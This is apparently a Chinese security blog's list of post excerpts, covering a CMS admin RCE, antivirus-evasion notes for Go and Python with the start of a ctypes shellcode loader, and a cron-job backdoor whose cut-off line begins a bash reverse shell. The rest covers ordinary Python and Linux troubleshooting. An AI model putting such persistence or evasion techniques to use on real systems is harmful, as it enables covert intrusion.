-
baijiacmsV4 后台RCE
项目地址:https://github.com/baijiacms/baijiacmsV4版本:V4.1.4 20170105 FINAL环境: php 5.5.38 nginx 1.15 mysql 5.7.27 20.04.1-Ubuntu ... -
go免杀笔记
参考:https://geektutu.com/post/quick-golang.htmlhttps://www.freebuf.com/sectool/328982.htmlhttps://github.com/awsaaaq/GoBP 1go读... -
python免杀复习
1最基础的版本: 1234567891011121314151617181920212223242526272829303132import ctypesdef py3loader(shellcode): shellcode = byt... -
cron计划任务后门
在学习vulfocus的aira2文件写入时用到的, 123SHELL=/bin/bash*/1 * * * * root /bin/bash -i >& /dev&... -
linux 下重定向的注意事项
1 重定向输出通常使用>和>> > 覆盖 >> 追加 2 在linux的重定向中: 0 1 2代表着不同的涵义。 0表示标准输入。 1标准输出。 2标准错误信息输出。 通过... -
python str.format 中文对齐的细节问题
参考:https://www.cnblogs.com/Black-Ice/p/10846848.htmlhttps://blog.csdn.net/code4101/article/details/80985218 解决方法: 12345678ban... -
python importError: cannot import name 'XXX' 错误
模拟一下当时的情况 ,一个有三个文件config.py 1DEBUG = True log.py 1234from config import DEBUGdef test(msg): if DEBUG: print("er... -
python2 出现ERROR: Command errored out with exit status 1
记录一下遇到的一个bug系统:ubuntupython2,代码里用到了import MySQLdb,但是运行时报错 import MySQLdb as dbImportError: No module named MySQLdb 于是去pip安装这... -
杂七杂八nightmare使用笔记
github:https://github.com/joxeankoret/nightmaredoc里的介绍文件是全英文的,我用有道翻译简单整理了一下,上传到博客园了https://files.cnblogs.com/files/This-is-Y/... -
当手机屏幕无法使用时
家里有个旧手机,但是屏幕没用了,最近正好需要用一个手机完成一些工作,就打算用scrcpy把它复活一下。 准备操作的时候面临一下几个问题 连接scrcpy时需要开启usb调试(在开发者选项里),屏幕受损无法控制。 有些情况好像要usb调试的安全模式(...